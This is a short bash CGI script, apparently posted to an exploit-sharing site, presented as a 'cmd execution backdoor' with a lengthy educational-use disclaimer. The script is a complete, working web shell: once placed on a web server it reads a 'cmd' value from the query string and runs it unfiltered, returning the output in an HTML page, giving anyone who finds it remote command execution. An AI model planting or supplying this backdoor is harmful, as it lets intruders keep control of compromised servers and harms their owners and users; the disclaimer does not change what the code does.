Simple CGI (bash) cmd execution backdoor

1. #!/bin/sh
2. #
3. #  Simple CGI (bash) backdoor
4. #
5. #  [email protected]
6. #  http://www.ethical-hacker.org/
7. #  https://www.facebook.com/ethicalhackerorg
8. #  http://pastebin.com/u/hackerscommunity
9. #
10. #  Disclaimer:
11. #  This  or  previous program  is  for Educational
12. #  purpose ONLY. Do not use it without permission.
13. #  The  usual  disclaimer  applies, especially the
14. #  fact  that  Todor Donev  is  not liable for any
15. #  damages caused by direct or indirect use of the
16. #  information or functionality  provided by these
17. #  programs.  The author or any  Internet provider
18. #  bears  NO  responsibility for content or misuse
19. #  of these programs or  any  derivatives thereof.
20. #  By  using  these  programs  you accept the fact
21. #  that any damage (dataloss, system crash, system
22. #  compromise,  etc.)  caused  by the use of these
23. #  programs is not  Todor Donev's  responsibility.
24. #
25. #  Use  at  your  own risk and educational purpose
26. #  ONLY!
27. #
28. echo "Content-type: text/html"
29. echo "
30. <html>
31. <body>
32. <pre>"
33. if [ -z "$QUERY_STRING" ]; then
34. exit 0
35. else
36. cmd=`echo "$QUERY_STRING" | sed -n 's/^.*cmd=\([^&]*\).*$/\1/p' | sed "s/%20/ /g"`
37. fi
38. $cmd
39. echo "</pre>
40. </body>
41. </html>
42. "